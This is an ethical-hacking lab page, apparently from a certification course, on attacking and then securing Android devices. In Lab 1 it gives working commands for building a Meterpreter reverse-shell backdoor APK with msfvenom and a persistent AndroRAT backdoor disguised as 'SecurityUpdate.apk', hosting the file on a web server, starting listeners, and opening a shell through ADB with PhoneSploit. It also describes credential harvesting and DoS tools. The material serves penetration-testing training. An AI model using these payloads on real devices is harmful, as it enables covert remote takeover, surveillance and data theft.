Module 17: Hacking Mobile Platforms

Lab 1: Hack Android Devices

Overview of Hacking Android Platforms

Android is a software environment developed by Google for mobile devices. It includes an OS, a middleware, and key applications. Its Linux-based OS is designed especially for portable devices such as smartphones and tablets. Android has a stack of software components categorized into six sections (System Apps, Java AP Framework, Native C/C++ Libraries, Android Runtime, Hardware Abstraction Layer [HAL], and Linux kernel) and five layers.

Owing to the increase in the number of users with Android devices, they have become the primary targets for hackers. Attackers use various Android hacking tools to discover vulnerabilities in the platform, and then exploit them to carry out attacks such as DoS, Man-in-the-Disk, and Spear phone attacks.

Task 1: Hack an Android Device by Creating Binary Payloads using Parrot Security

Attackers use various tools such as Metasploit to create binary payloads, which are sent to the target system to gain control over it. The Metasploit Framework is a Ruby-based, modular penetration testing platform that enables you to write, test, and execute exploit code. It contains a suite of tools that you can use to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. Meterpreter is a Metasploit attack payload that provides an interactive shell that can be used to explore target machines and execute code.

msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=10.10.1.13 R > Desktop/Backdoor.apk

This command creates an APK (Backdoor.apk) on Desktop under the Root directory. In this case, 10.10.1.13 is the IP address of the Parrot Security machine.

Task 2: Harvest Users’ Credentials using the Social-Engineer Toolkit

The Social-Engineer Toolkit (SET) is an open-source, Python-driven tool that enables penetration testing via social engineering. It is a generic exploit that can be used to carry out advanced attacks against human targets in order to get them to offer up sensitive information. SET categorizes attacks according to the attack vector used to trick people such as email, web, or USB. The toolkit attacks human weakness, exploiting people’s trust, fear, avarice, or helping natures.

Task 3: Launch a DoS Attack on a Target machine using Low Orbit Ion Cannon (LOIC) on the Android Mobile Platform

Low Orbit Ion Cannon (LOIC) is an open-source network stress testing and Denial-of-Service (DoS) attack application. LOIC performs a DoS attack (or when used by multiple individuals, a DDoS attack) on a target site by flooding the server with TCP or UDP packets with the intention of disrupting the service of a particular host. People have used LOIC to join voluntary botnets.

Task 4: Exploit the Android Platform through ADB using PhoneSploit

Android Debug Bridge (ADB) is a versatile command-line tool that lets you communicate with a device. ADB facilitates a variety of device actions such as installing and debugging apps, and provides access to a Unix shell that you can use to run several different commands on a device.

Usually, developers connect to ADB on Android devices by using a USB cable, but it is also possible to do so wirelessly by enabling a daemon server at TCP port 5555 on the device.

 python3 -m pip install colorama

colorama is a Python library for cross-platform colored terminal text. It simplifies adding colors and styles to terminal output, making it more readable and engaging.

python3 phonesploit.py

  • Type 3 and press Enter to select [3] Connect a new phone option.

  • When prompted to Enter a phones ip address, type the target Android device’s IP address and press Enter.

  • Now, at the main_menu prompt, type 4 and press Enter to choose Access Shell on a phone.

  • When prompted to Enter a device name, type the target Android device’s IP address and press Enter.

  • You can observe that a shell command line appears, as shown in the screenshot.

Task 5: Hack an Android Device by Creating APK File using AndroRAT

AndroRAT is a tool designed to give control of an Android system to a remote user and to retrieve information from it. AndroRAT is a client/server application developed in Java Android for the client side and the Server is in Python. AndroRAT provides a fully persistent backdoor to the target device as the app starts automatically on device boot up, it also obtains the current location, sim card details, IP address and MAC address of the device.

python3 androRAT.py --build -i 10.10.1.13 -p 4444 -o SecurityUpdate.apk

  • --build: is used for building the APK

  • -i: specifies the local IP address (here, 10.10.1.13)

  • -p: specifies the port number (here, 4444)

  • -o: specifies the output APK file (here, SecurityUpdate.apk)

cp /home/attacker/AndroRAT/SecurityUpdate.apk /var/www/html/share/

If the share folder does not exist, then execute the following commands to create a share folder and assign required permissions to it:

  • Type mkdir /var/www/html/share and press Enter to create a shared folder

  • Type chmod -R 755 /var/www/html/share and press Enter

  • Type chown -R www-data:www-data /var/www/html/share and press Enter

service apache2 start 
python3 androRAT.py --shell -i 0.0.0.0 -p 4444

  • --shell: is used for getting the interpreter

  • -i: specifies the IP address for listening (here, 0.0.0.0)

  • -p: specifies the port number (here, 4444)

You can also use other Android hacking tools such as

  • NetCut (https://www.arcai.com)

  • drozer (https://labs.f-secure.com)

  • zANTI (https://www.zimperium.com)

  • Network Spoofer (https://www.digitalsquid.co.uk)

  • DroidSheep (https://droidsheep.info)

Lab 2: Secure Android Devices using Various Android Security Tools

Overview of Android Security Tools

Android security tools reveal the security posture of particular Android platforms and devices. You can use them to find various ways to strengthen the security and robustness of your organization’s mobile platforms. These tools automate the process of accurate Android platform security assessment.

Task 1: Analyze a Malicious App using Online Android Analyzers

Online Android analyzers allow you to scan Android APK packages and perform security analyses to detect vulnerabilities in particular apps. Some trusted online Android analyzers are Sixo Online APK Analyzer.

You can also use other Android vulnerability scanners such as

  • X-Ray 2.0 (https://duo.com)

  • Vulners Scanner (https://play.google.com)

  • Shellshock Scanner - Zimperium (https://play.google.com)

  • Yaazhini (https://www.vegabird.com)

  • Quick Android Review Kit (QARK) (https://github.com)

Task 2: Secure Android Devices from Malicious Apps using Malwarebytes Security

Malwarebytes is an antimalware mobile tool that provides protection against malware, ransomware, and other growing threats to Android devices. It blocks, detects, and removes adware and malware; conducts privacy audits for all apps; and ensures safer browsing.

You can use other mobile antivirus and anti-spyware tools such as

  • AntiSpy Mobile (https://antispymobile.com)

  • Spyware Detector - Spy Scanner (https://play.google.com)

  • iAmNotified - Anti Spy System (https://iamnotified.com)

  • Privacy Scanner (AntiSpy) Free (https://play.google.com)

Hacker's Mantra:Pattern is often predictable, and anything predictable can be hacked. - Aniekee Tochukwu Ezekiel

PreviousModule 16: Hacking Wireless NetworksNextModule 18: IoT and OT Hacking